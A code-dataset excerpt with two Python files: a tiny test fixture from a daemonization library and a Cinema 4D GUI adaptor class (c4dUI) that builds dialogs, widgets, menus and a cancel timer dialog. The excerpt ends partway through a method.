Muterra/py_daemoniker | tests/autotest/_fixtures.py | 1 | 1155 | '''
LICENSING
-------------------------------------------------
daemoniker: Cross-platform daemonization tools.
Copyright (C) 2016 Muterra, Inc.
Contributors
------------
Nick Badger
[email protected] | [email protected] | nickbadger.com
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the
Free Software Foundation, Inc.,
51 Franklin Street,
Fifth Floor,
Boston, MA 02110-1301 USA
------------------------------------------------------
'''
global __SKIP_ALL_REMAINING__
__SKIP_ALL_REMAINING__ = False | unlicense | -1,125,921,936,101,238,800 | 32.028571 | 70 | 0.644156 | false |
corredD/upy | cinema4d/r20/c4dUI.py | 1 | 40522 |
"""
Copyright (C) <2010> Autin L. TSRI
This file git_upy/cinema4d/r14/c4dUI.py is part of upy.
upy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
upy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with upy. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.
"""
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 2 18:17:17 2010
@author: -
"""
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 2 13:45:52 2010
@author: -
"""
import sys,os
import c4d
from c4d import plugins
from c4d import utils
from c4d import bitmaps
from c4d import gui
import random
from upy.uiAdaptor import uiAdaptor
#UI general interface
class c4dUI(gui.GeDialog):
"""
The cinema4d uiAdaptor abstract class
====================================
This Adaptor give access to the basic cinema4d Draw function need for
create and display a gui.
"""
host = "c4d"
scale = 1
maxStrLenght=100
left, top, right, bottom =(25,1,1,1)
oid=1005
bid=1005
id = 1005
plugid = int(random.random()*10000000)
dock = False
w=100
h=100
tab=False
notebook = None
ystep = 0
scrolling = True
def addVariablePropToSc (self, *args):
#ghost function
pass
def CoreMessage(self, id, msg):
""" Hanlde the system event such as key or mouse position """
# print "coremessage"
# print "id",id
# print "msg",msg
return True
#-1008
#20000000073
def _setTitle(self,title):
self.SetTitle(title)
def createMenu(self,menuDic,menuOrder=None):
""" Define and draw the window/widget top file menu
@type menuDic: dictionary
@param menuDic: the menu elements, ie entry, callback and submenu
@type menuOrder: array
@param menuOrder: the menu keys oredered
"""
if menuOrder :
lookat = menuOrder
else :
lookat = menuDic.keys()
self.MenuFlushAll()
for mitem in lookat:
self.MenuSubBegin(mitem)
for elem in menuDic[mitem]:
if elem["sub"] is not None:
self.MenuSubBegin(elem["name"])
for sub in elem['sub']:
self.MenuAddString(elem['sub'][sub]["id"],
elem['sub'][sub]["name"])
self.MenuSubEnd()
else:
self.MenuAddString(elem["id"],elem["name"])
self.MenuSubEnd()
self.MenuFinished()
def handleMenuEvent(self,ev,menu):
""" This function handle the particular menu event, especially for
submenu level action
@type ev: int
@param ev: the current event
@type menu: dictionary
@param menu: the current menu
"""
#verify Enter?
print "menu",ev
if ev == 1056 :
return
for menuId in menu.keys():
for elem in menu[menuId]:
if elem["sub"] is not None:
for sub in elem['sub'].keys():
#print ev,elem['sub'][sub]["id"]
if ev == elem['sub'][sub]["id"] :
#print elem['sub'][sub]
if self._timer :
self.timeFunction(elem['sub'][sub]["action"],ev)
else :
self.callbackaction(elem['sub'][sub],ev)
else :
if ev==elem["id"] :
if self._timer :
self.timeFunction(elem["action"],ev)
else :
self.callbackaction(elem,ev)
def addVariable(self,type,value):
""" Create a container for storing a widget states """
return value
def drawObj(self,elem,x,y,w=None,h=None):
""" Draw an object input where you can drag on object
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
pass
#elem["id"] = gui.LinkBoxGui()
def getFlagAlignement(self,options):
alignement = {"hleft_scale":c4d.BFH_LEFT|c4d.BFH_SCALE| c4d.BFV_MASK,
"hcenter_scale":c4d.BFH_CENTER|c4d.BFH_SCALE| c4d.BFV_MASK,
"hleft":c4d.BFH_LEFT| c4d.BFV_MASK,
"hfit":c4d.BFH_FIT| c4d.BFV_MASK,
"hfit_scale":c4d.BFH_SCALEFIT| c4d.BFV_MASK,
"hcenter":c4d.BFH_CENTER| c4d.BFV_MASK,
}
if type(options) is int :
return options
elif options not in alignement :
print options
return c4d.BFH_SCALEFIT|c4d.BFV_MASK
return alignement[options]
def drawButton(self,elem,x,y,w=None,h=None):
""" Draw a Button
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
name = elem["name"]
if elem["label"] != None:
name = elem["label"]
self.AddButton(id=elem["id"], flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale,
name=name)
def drawCheckBox(self,elem,x,y,w=None,h=None):
""" Draw a checkBox
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
name = elem["name"]
if elem["label"] != None:
name = elem["label"]
self.AddCheckbox(id=elem["id"],flags=elem["alignement"],#BFH_SCALEFIT,
name=name,
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["value"] is not None :
self.SetBool(elem["id"],elem["value"])
def resetPMenu(self,elem):
""" Add an entry to the given pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
"""
elem["value"]=[]
self.FreeChildren(elem["id"])
def addItemToPMenu(self,elem,item):
""" Add an entry to the given pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
@type item: string
@param item: the new entry
"""
self.AddChild(elem["id"],len(elem["value"]),item)
elem["value"].append(item)
self.SetLong(elem["id"],len(elem["value"])-1)
def drawPMenu(self,elem,x,y,w=None,h=None):
""" Draw a pulldown menu
@type elem: dictionary
@param elem: the pulldown dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_LEFT|c4d.BFH_SCALEFIT
self.AddComboBox(id=elem["id"],flags=elem["alignement"],
initw=elem["width"]*self.scale)
# inith=elem["height"]*self.scale)
[self.AddChild(elem["id"],x[0],x[1]) for x in enumerate(elem["value"])]
def drawLine(self,elem,x,y,w=None,h=None):
""" Draw a Separative Line
@type elem: dictionary
@param elem: the label dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["value"] == "H":
self.AddSeparatorH(self.w,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK)
elif elem["value"] == "V":
self.AddSeparatorV(self.w,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK)
def drawLabel(self,label,x,y,w=None,h=None):
""" Draw a Label
@type elem: dictionary
@param elem: the label dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if label["alignement"] is None :
label["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddStaticText(label["id"],flags=label["alignement"])#BFH_SCALEFIT)#|c4d.BFV_SCALEFIT)#c4d.BFH_LEFT)c4d.BFH_LEFT|
self.SetString(label["id"],label["label"])
def drawStringArea(self,elem,x,y,w=None,h=None):
""" Draw a String Area input elem, ie multiline
@type elem: dictionary
@param elem: the string area input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddMultiLineEditText(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale,
style=c4d.DR_MULTILINE_SYNTAXCOLOR)
self.SetString(elem["id"],elem["value"])
def drawString(self,elem,x,y,w=None,h=None):
""" Draw a String input elem
@type elem: dictionary
@param elem: the string input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddEditText(id=elem["id"],
flags=elem["alignement"],#| c4d.BFV_MASK,#BFH_CENTER
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
self.SetString(elem["id"],elem["value"])
def drawSliders(self,elem,x,y,w=None,h=None):
""" Draw a Slider elem, the variable/value of the elem define the slider format
@type elem: dictionary
@param elem: the slider input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
self.AddEditSlider(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["variable"] is None :
elem["variable"] =0.0
if elem["maxi"] is None :
elem["maxi"] =0.0
if elem["mini"] is None :
elem["mini"] =0.0
if elem["step"] is None :
elem["step"] =0.0
self.SetReal(elem["id"],float(elem["variable"]),float(elem["mini"]),
float(elem["maxi"]), float(elem["step"]))
def drawNumbers(self,elem,x,y,w=None,h=None):
""" Draw a Int input elem
@type elem: dictionary
@param elem: the Int input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
if elem["value"] is None :
elem["value"] = elem["variable"]
self.AddEditNumberArrows(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
self.SetLong(elem["id"],int(elem["value"]),int(elem["mini"]),
int(elem["maxi"]))
def drawFloat(self,elem,x,y,w=None,h=None):
""" Draw a float input elem
@type elem: dictionary
@param elem: the Int input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
if elem["value"] is None :
elem["value"] = elem["variable"]
if elem["value"] is None :
elem["value"] =0.0
if elem["maxi"] is None :
elem["maxi"] =0.0
if elem["mini"] is None :
elem["mini"] =0.0
self.AddEditNumberArrows(id=elem["id"],
flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
#print float(elem["value"]),float(elem["mini"]),float(elem["maxi"])
self.SetReal(elem["id"],float(elem["value"]),float(elem["mini"]),
float(elem["maxi"]))
def drawImage(self,elem,x,y,w=None,h=None):
""" Draw an Image, if the host supported it
@type elem: dictionary
@param elem: the image input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
pass
# bmp = c4d.bitmaps.BaseBitmap()
# bmp.InitWith(elem["value"])
# bc = c4d.BaseContainer()
# need to use userarea
# area = c4d.gui.GeUserArea()
# self.AddUserArea(5000,flags=c4d.BFH_SCALEFIT,initw=100, inith=150)
# self.AttachUserArea(area, id=10, userareaflags=c4d.USERAREA_COREMESSAGE)
# self.area.DrawBitmap(bmp, 0, 0, 396, 60, 0, 0, 396, 60, mode=c4d.BMP_NORMALSCALED)#396x60
## self.area.DrawText('welcome to ePMV '+__version__, 0, 0, flags=c4d.DRAWTEXT_STD_ALIGN)
# self.area.Init()
# self.area.InitValues()
def drawColorField(self,elem,x,y,w=None,h=None):
""" Draw a Color entry Field
@type elem: dictionary
@param elem: the color input dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = elem["alignement"]
# print elem
self.AddColorField(id=elem["id"],flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale)
if elem["value"]is not None:
# print "v",elem["value"]
self.setColor(elem,elem["value"])
# print "n",elem["name"]
def drawError(self,errormsg=""):
""" Draw a error message dialog
@type errormsg: string
@param errormsg: the messag to display
"""
c4d.gui.MessageDialog("ERROR: "+errormsg)
def drawQuestion(self,title="",question="",callback=None):
""" Draw a Question message dialog, requiring a Yes/No answer
@type title: string
@param title: the windows title
@type question: string
@param question: the question to display
@rtype: bool
@return: the answer
"""
res = c4d.gui.QuestionDialog(question)
if callback is not None :
callback(res)
else :
return res
def drawMessage(self,title="",message=""):
""" Draw a message dialog
@type title: string
@param title: the windows title
@type message: string
@param message: the message to display
"""
c4d.gui.MessageDialog(message)
def drawInputQuestion(self,title="",question="",callback=None):
""" Draw an Input Question message dialog, requiring a string answer
@type title: string
@param title: the windows title
@type question: string
@param question: the question to display
@rtype: string
@return: the answer
"""
result = c4d.gui.InputDialog(question,"")
if result :
if callback is not None :
callback(result)
else :
return result
def drawFrame(self,bloc,x,y):
"""
Function to draw a block as a collapsable frame layout of the gui.
@type block: array or dictionary
@param block: list or dictionary of item dictionary
@type x: int
@param x: position on x in the gui windows, used for blender
@type y: int
@param y: position on y in the gui windows, used for blender
@rtype: int
@return: the new horizontal position, used for blender
"""
grFlag = c4d.BFH_SCALEFIT# |c4d.BFV_MASK
if bloc["scrolling"]:
self.ScrollGroupBegin(id=50000, flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
scrollflags= c4d.SCROLLGROUP_NOSCROLLER|c4d.SCROLLGROUP_NOBLIT)#c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
else :
self.ScrollGroupBegin(id=50000, flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
scrollflags= c4d.SCROLLGROUP_NOSCROLLER|c4d.SCROLLGROUP_NOBLIT)#c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
if bloc["collapse"] :
collapse = c4d.BFV_BORDERGROUP_FOLD#|c4d.BFV_GRIDGROUP_EQUALCOLS
else :
collapse = c4d.BFV_BORDERGROUP_FOLD|c4d.BFV_BORDERGROUP_FOLD_OPEN
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#rows=len(bloc["elems"]),
flags= c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT,
groupflags=collapse)
self.GroupBorder(c4d.BORDER_ROUND|c4d.BORDER_THIN_IN|c4d.BORDER_WITH_TITLE|c4d.BORDER_MASK)#|c4d.BORDER_MASK
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
for k,blck in enumerate(bloc["elems"]):
self.startBlock(m=len(blck))
for index, item in enumerate(blck):
self._drawElem(item,x,y)
self.endBlock()
self.endBlock()
self.endBlock()
#if bloc["scrolling"]:
# self.endBlock()#scroll
# self.endBlock()#main
return y
def drawTab(self,bloc,x,y):
"""
Function to draw a block as a collapsable frame layout of the gui.
@type block: array or dictionary
@param block: list or dictionary of item dictionary
@type x: int
@param x: position on x in the gui windows, used for blender
@type y: int
@param y: position on y in the gui windows, used for blender
@rtype: int
@return: the new horizontal position, used for blender
"""
#TODO the Group system is confusin and nee to be improved inuPy
#can we change color?
if not self.tab :
self.notebook = self.TabGroupBegin(id=bloc["id"]*1000,#title=bloc["name"],cols=1,
flags=c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT,
tabtype=c4d.TAB_TABS)
self.GroupBorder(c4d.BORDER_THIN_IN|c4d.BORDER_MASK)#c4d.BORDER_BLACK|BORDER_WITH_TITLE
self.tab = True
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_MASK
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#initw=self.w,inith=self.h,
flags=grFlag)#c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT)#BFH_CENTER)
if bloc["scrolling"]:
self.ScrollGroupBegin(id=bloc["id"]*5, flags=c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT,
scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# inith=100,initw=1000)
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
# self.GroupBorderNoTitle(c4d.BORDER_NONE|c4d.BORDER_WITH_TITLE)
#should use max number of column?
#get max nb elem:
        maxi = 0
        for k,blck in enumerate(bloc["elems"]):
            if len(blck) > maxi :
                maxi = len(blck)
self.GroupBegin(id=bloc["id"],title=bloc["name"],cols=1,#initw=self.w,inith=self.h,
flags=grFlag)#c4d.BFH_SCALEFIT|c4d.BFV_SCALEFIT)#BFH_CENTER)
# if bloc["scrolling"]:
# self.GroupBorder(c4d.BORDER_THIN_IN|c4d.BORDER_WITH_TITLE|c4d.BORDER_WITH_TITLE_BOLD| c4d.BORDER_MASK)
# else :
# self.GroupBorderNoTitle(c4d.BORDER_THIN_IN|c4d.BORDER_MASK)
# if self.scrolling:
# self.ScrollGroupBegin(id=bloc["id"]*5000, flags=c4d.BFH_CENTER | c4d.BFV_MASK,#initw=self.w,inith=self.h,
# scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT|c4d.SCROLLGROUP_BORDERIN|c4d.SCROLLGROUP_STATUSBAR | c4d.SCROLLGROUP_NOBLIT)
# BFV_SCALEFIT | BFH_SCALEFIT,
# SCROLLGROUP_STATUSBAR | SCROLLGROUP_BORDERIN |
# SCROLLGROUP_NOBLIT
for k,blck in enumerate(bloc["elems"]):
if type(blck) is list :
self.GroupBegin(id=int(k*25),cols=len(blck),title=str(k),
flags=c4d.BFH_SCALEFIT)#c4d.BFH_CENTER)
for index, item in enumerate(blck):
self._drawElem(item,x,y)
self.endBlock()
else : #dictionary: multiple line / format dict?
if "0" in blck:
y = self._drawGroup(blck,x,y)
else :
blck["scrolling"] = False
y = self._drawFrame(blck,x,y)
# if self.scrolling:
# self.endBlock()
if bloc["scrolling"]:
self.endBlock()
self.endBlock()
self.endBlock()
# self.LayoutChanged(bloc["id"])
return y
def saveDialog(self,label="",callback=None, suffix=""):
""" Draw a File input dialog
@type label: string
@param label: the windows title
@type callback: function
@param callback: the callback function to call
"""
filename = c4d.storage.SaveDialog(c4d.FSTYPE_ANYTHING,label)
if callback is not None:
return callback(filename)
else :
return filename
def fileDialog(self,label="",callback=None, suffix=""):
""" Draw a File input dialog
@type label: string
@param label: the windows title
@type callback: function
@param callback: the callback function to call
"""
filename = c4d.storage.LoadDialog(c4d.FSTYPE_ANYTHING,label)
if callback is not None:
return callback(filename)
else :
return filename
def waitingCursor(self,toggle):
""" Toggle the mouse cursor appearance from the busy to idle.
@type toggle: Bool
@param toggle: Weither the cursor is busy or idle
"""
if not toggle :
c4d.gui.SetMousePointer(c4d.MOUSE_NORMAL)
else :
c4d.gui.SetMousePointer(c4d.MOUSE_BUSY)
def updateViewer(self):
"""
update the 3d windows if any
"""
c4d.EventAdd()
c4d.DrawViews(c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW|c4d.DRAWFLAGS_NO_THREAD|c4d.DRAWFLAGS_NO_ANIMATION)
c4d.GeSyncMessage(c4d.EVMSG_TIMECHANGED)
def startBlock(self,m=1,n=1):
if m == 0:
m = 1
self.GroupBegin(id=1,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK,
cols=m, rows=n)
self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
# self.bid+=1
def endBlock(self):
self.GroupEnd()
#self.GroupEnd()
def startLayout(self):
grFlag = c4d.BFH_SCALEFIT |c4d.BFV_MASK
grFlag = c4d.BFH_SCALEFIT| c4d.BFV_SCALEFIT | c4d.BFV_GRIDGROUP_EQUALROWS
if self.scrolling:
self.ScrollGroupBegin(id=2, flags=grFlag,
scrollflags=c4d.SCROLLGROUP_VERT)
#grFlag = c4d.BFH_SCALEFIT |c4d.BFV_SCALEFIT
self.GroupBegin(id=1,flags=grFlag ,cols=1)#initw ?
#self.GroupBorder(c4d.BORDER_ROUND|c4d.BORDER_THIN_IN)
def endLayout(self):
self.GroupEnd()
if self.scrolling:
self.GroupEnd()
## SCROLLGROUP_VERT Allow the group to scroll vertically.
## SCROLLGROUP_HORIZ Allow the group to scroll horizontally.
## SCROLLGROUP_NOBLIT Always redraw the whole group, not just new areas, when scrolling.
## SCROLLGROUP_LEFT Create the vertical slider to the left.
## SCROLLGROUP_BORDERIN Display a small border around the scroll group.
## SCROLLGROUP_STATUSBAR Create a status bar for the scroll group.
## SCROLLGROUP_AUTOHORIZ Only show horizontal slider if needed.
## SCROLLGROUP_AUTOVERT Only show vertical slider if needed.
## SCROLLGROUP_NOSCROLLER No scroller.
## SCROLLGROUP_NOVGAP No vertical gap.
## SCROLLGROUP_STATUSBAR_EXT_GROUP Creates an extern group within the statusbar.
# if self.scrolling:
# self.ScrollGroupBegin(id=50000, flags=c4d.BFH_SCALEFIT | c4d.BFV_SCALEFIT,
# scrollflags=c4d.SCROLLGROUP_VERT|c4d.SCROLLGROUP_AUTOVERT)
# self.GroupBorderSpace(self.left, self.top, self.right, self.bottom)
##
# if self.tab:
# self.GroupEnd()#self.Activate(1)#GroupEnd()
#
def getString(self,elem):
""" Return the current string value of the String Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: string
@return: the current string input value for this specific elem
"""
return self.GetString(elem["id"])
def setString(self,elem,val):
""" Set the current String value of the string input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: string
@param val: the new string value
"""
self.SetString(elem["id"],val)
def getStringArea(self,elem):
""" Return the current string area value of the String area Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: string
@return: the current string area input value for this specific elem
"""
return self.GetString(elem["id"])
def setStringArea(self,elem,val):
""" Set the current String area value of the string input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: string
@param val: the new string value (multiline)
"""
self.SetString(elem["id"],val)
def getReal(self,elem):
""" Return the current Float value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Float
@return: the current Float value input for this specific elem
"""
val = self.GetReal(elem["id"])
#check if its a real actually
if isinstance(val, float):
return val
def setReal(self,elem,val):
""" Set the current Float value of the Float input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Float
@param val: the new Float value
"""
print elem,val
print type(val)
return self.SetReal(elem["id"],float(val))
def getBool(self,elem):
""" Return the current Bool value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Bool
@return: the current Bool value input for this specific elem
"""
return self.GetBool(elem["id"])
def setBool(self,elem,val):
""" Set the current Bool value of the Bool input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Bool
@param val: the new Bool value
"""
return self.SetBool(elem["id"],bool(val))
def getLong(self,elem):
""" Return the current Int value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Int
@return: the current Int value input for this specific elem
"""
val = self.GetLong(elem["id"])
if isinstance(val, int):
return val
def setLong(self,elem,val):
""" Set the current Int value of the Int input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Int
@param val: the new Int value
"""
return self.SetLong(elem["id"],int(val))
def getColor(self,elem):
""" Return the current Color value of the Input elem
@type elem: dictionary
@param elem: the elem input dictionary
@rtype: Color
@return: the current Color array RGB value input for this specific elem
"""
c4dcol = self.GetColorField(elem["id"])['color']
return [c4dcol.x,c4dcol.y,c4dcol.z]
def setColor(self,elem,val):
""" Set the current Color rgb arrray value of the Color input elem
@type elem: dictionary
@param elem: the elem input dictionary
@type val: Color
@param val: the new Color value
"""
# print "in setColor",elem
c4dcol = self.GetColorField(elem["id"])
# print elem["id"]
c4dcol['color'].x=val[0]
c4dcol['color'].y=val[1]
c4dcol['color'].z=val[2]
self.SetColorField(elem["id"],c4dcol['color'],1.0,1.0,0)
def setAction(self,elem,callback):
elem["action"] = callback
def updateSlider(self,elem,mini,maxi,default,step):
""" Update the state of the given slider, ie format, min, maxi, step
@type elem: dictionary
@param elem: the slider elem dictionary
@type maxi: int/float
@param maxi: max value for the item, ie slider
@type mini: int/float
@param mini: min value for the item, ie slider
@type default: int/float
@param default: default value for the item, ie slider
@type step: int/float
@param step: step value for the item, ie slider
"""
if type(step) is int:
doit = self.SetLong
else :
doit = self.SetReal
doit(elem["id"],default,mini,maxi,step)
@classmethod
def _restore(self,rkey,dkey=None):
"""
        Function used to restore the window data, useful for plugins
@type rkey: string
@param rkey: the key to access the data in the registry/storage
@type dkey: string
        @param dkey: whether we want a particular entry from the stored dict
"""
if hasattr(c4d,rkey):
obj = c4d.__dict__[rkey]
if dkey is not None:
if c4d.__dict__[rkey].has_key(dkey) :
return c4d.__dict__[rkey][dkey]
else :
return None
return obj
else :
return None
@classmethod
def _store(self,rkey,dict):
"""
        Function used to store the window data, useful for plugins
@type rkey: string
@param rkey: the key to access the data in the registry/storage
@type dict: dictionary
@param dict: the storage is done throught a dictionary
"""
c4d.__dict__[rkey]= dict
def drawSubDialog(self,dial,id,callback = None,asynchro = True):
"""
Draw the given subdialog whit his own element and callback
@type dial: dialog Object
@param dial: the dialog object to be draw
@type id: int
@param id: the id of the dialog
@type callback: function
@param callback: the associate callback
"""
print (dial,id,asynchro)
if asynchro :
dial.Open(c4d.DLG_TYPE_ASYNC, pluginid=id, defaultw=dial.w, defaulth=dial.h)
else :
dial.Open(c4d.DLG_TYPE_MODAL, pluginid=id, defaultw=dial.w, defaulth=dial.h)
def close(self,*args):
""" Close the windows"""
self.Close()
def display(self):
""" Create and Open the current gui windows """
#how to display it/initialize it ?
self.Open(c4d.DLG_TYPE_ASYNC, pluginid=self.plugid,
defaultw=self.w, defaulth=self.h)
def getDirectory(self):
"""return software directory for script and preferences"""
prefpath=c4d.storage.GeGetC4DPath(1)
os.chdir(prefpath)
os.chdir(".."+os.sep)
self.prefdir = os.path.abspath(os.curdir)
if sys.platform == "darwin" :
self.softdir = c4d.storage.GeGetC4DPath(4)
elif sys.platform == "win32":
self.softdir = c4d.storage.GeGetC4DPath(2)
class c4dUIDialog(c4dUI,uiAdaptor):
def __init__(self,**kw):
if kw.has_key("title"):
self.title= kw["title"]
self._setTitle(self.title)
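# Illustrative sketch (an assumption based on the methods above, not part of
# the original file): instantiate the dialog, then call display() to open it
# asynchronously inside Cinema 4D.
#
#   dial = c4dUIDialog(title="my tool")
#   dial.w, dial.h = 240, 180
#   dial.display()   # wraps Open(c4d.DLG_TYPE_ASYNC, ...) defined above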
#class c4dUISubDialog(c4dUI,uiAdaptor):
# def __init__(self,):
# c4dUIDialog.__init__(self,)
#
###############WIDGET####################################
import time
class TimerDialog(c4d.gui.SubDialog):
"""
Timer dialog for c4d; waits a given time for user input.
from Pmv.hostappInterface.cinema4d_dev import helperC4D as helper
dial = helper.TimerDialog()
dial.cutoff = 30.0
dial.Open(c4d.DLG_TYPE_ASYNC, pluginid=3555550, defaultw=250, defaulth=100)
"""
def init(self):
self.startingTime = time.time()
self.dT = 0.0
self._cancel = False
self.SetTimer(100) # milliseconds
#self.cutoff = ctime #seconds
#self.T = int(ctime)
def initWidgetId(self):
id = 1000
self.BTN = {"No":{"id":id,"name":"No",'width':50,"height":10,
"action":self.continueFill},
"Yes":{"id":id+1,"name":"Yes",'width':50,"height":10,
"action":self.stopFill},
}
id += len(self.BTN)
self.LABEL_ID = [{"id":id,"label":"Did you want to Cancel the Job:"},
{"id":id+1,"label":str(self.cutoff) } ]
id += len(self.LABEL_ID)
return True
def CreateLayout(self):
ID = 1
self.SetTitle("Cancel?")
self.initWidgetId()
# minimize option/button
self.GroupBegin(id=ID,flags=c4d.BFH_SCALEFIT | c4d.BFV_MASK,
cols=2, rows=10)
self.GroupBorderSpace(10, 10, 5, 10)
ID +=1
self.AddStaticText(self.LABEL_ID[0]["id"],flags=c4d.BFH_LEFT)
self.SetString(self.LABEL_ID[0]["id"],self.LABEL_ID[0]["label"])
self.AddStaticText(self.LABEL_ID[1]["id"],flags=c4d.BFH_LEFT)
self.SetString(self.LABEL_ID[1]["id"],self.LABEL_ID[1]["label"])
ID +=1
for key in self.BTN.keys():
self.AddButton(id=self.BTN[key]["id"], flags=c4d.BFH_LEFT | c4d.BFV_MASK,
initw=self.BTN[key]["width"],
inith=self.BTN[key]["height"],
name=self.BTN[key]["name"])
self.init()
return True
def open(self):
self.Open(c4d.DLG_TYPE_MODAL, pluginid=25555589, defaultw=120, defaulth=100)
def Timer(self,val):
# print val; val seems to be the gadget itself?
# used to see whether the user answered or not... if nothing after x ms,
# close the dialog
# self.T -= 1.0
current_time = time.time()
self.dT = current_time - self.startingTime
# print self.dT, self.T
self.SetString(self.LABEL_ID[1]["id"],str(self.cutoff-self.dT ))
if self.dT > self.cutoff :
